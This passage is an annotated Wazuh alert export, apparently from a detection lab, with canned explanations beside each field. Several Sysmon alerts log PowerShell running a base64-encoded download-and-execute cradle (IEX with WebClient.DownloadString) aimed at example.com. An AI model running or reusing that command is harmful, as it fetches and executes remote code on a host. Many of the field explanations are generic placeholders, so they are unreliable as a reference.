- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 36 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534225.1217719 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:39.0226447Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282962 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:36.380
ProcessGuid: {94294ddc-bcf4-680a-eb0a-000000000e00}
ProcessId: 14892
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcf1-680a-e90a-000000000e00}
ParentProcessId: 9396
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:36.380 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcf4-680a-eb0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcf1-680a-e90a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9396 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 40 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534225.1225786 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:39.2679536Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282973 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:39.228
ProcessGuid: {94294ddc-bcf4-680a-eb0a-000000000e00}
ProcessId: 14892
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_yre4dc4i.koa.ps1
CreationUtcTime: 2025-04-24 22:36:39.228
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:39.228 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcf4-680a-eb0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_yre4dc4i.koa.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:39.228 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 37 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534225.1228555 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:41.9715607Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283043 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:40.440
ProcessGuid: {94294ddc-bcf8-680a-f10a-000000000e00}
ProcessId: 9540
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcf4-680a-eb0a-000000000e00}
ParentProcessId: 14892
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:40.440 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcf8-680a-f10a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9540 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcf4-680a-eb0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 14892 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 41 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534225.1236622 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:42.2552313Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283045 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:42.217
ProcessGuid: {94294ddc-bcf8-680a-f10a-000000000e00}
ProcessId: 9540
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_z1i14jqk.z5t.ps1
CreationUtcTime: 2025-04-24 22:36:42.217
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:42.217 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcf8-680a-f10a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9540 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_z1i14jqk.z5t.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:42.217 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from passed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from passed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from passed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19012 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['2.3.10.1'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534226.1239387 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
